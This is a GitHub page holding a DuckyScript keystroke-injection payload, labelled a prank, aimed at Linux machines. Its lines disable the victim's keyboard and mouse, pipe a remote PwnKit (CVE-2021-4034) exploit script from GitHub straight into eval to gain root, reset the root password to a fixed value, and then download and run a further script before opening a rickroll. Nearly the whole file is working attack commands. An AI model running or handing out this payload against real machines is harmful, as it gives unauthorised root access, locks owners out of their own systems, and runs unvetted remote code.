-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathPwnKit_Cred_Changer.txt
58 lines (51 loc) · 1.22 KB
/
PwnKit_Cred_Changer.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
REM Title: PwnKit Cred Changer
REM Author: Alex Lynd
REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
REM Target: Linux (Bash)
REM Props: Hak5, HakCat
REM Version: 1.0
REM Category: Prank
CTRL ALT T
DELAY 1000
REM disable keyboard
STRING xinput float 10
ENTER
REM disable mouse
STRING xinput float 12
ENTER
REM run PwnKit
STRING eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
ENTER
DELAY 1000
REM change root password
STRING passwd
ENTER
STRING meowmeow123
ENTER
DELAY 100
STRING meowmeow123
ENTER
DELAY 300
REM jack up volume
STRING amixer -D pulse sset Master unmute
ENTER
REM STRING amixer -D pulse sset Master 100%+
ENTER
REM download annoying payload
STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
ENTER
DELAY 500
STRING chmod +x linux-color-flasher.sh
ENTER
STRING ./linux-color-flasher.sh &
ENTER
DELAY 500
STRING espeak "you've been hacked loser, its time to get funky"
ENTER
DELAY 1000
STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
ENTER
DELAY 3000
SPACE
DELAY 1000
STRING F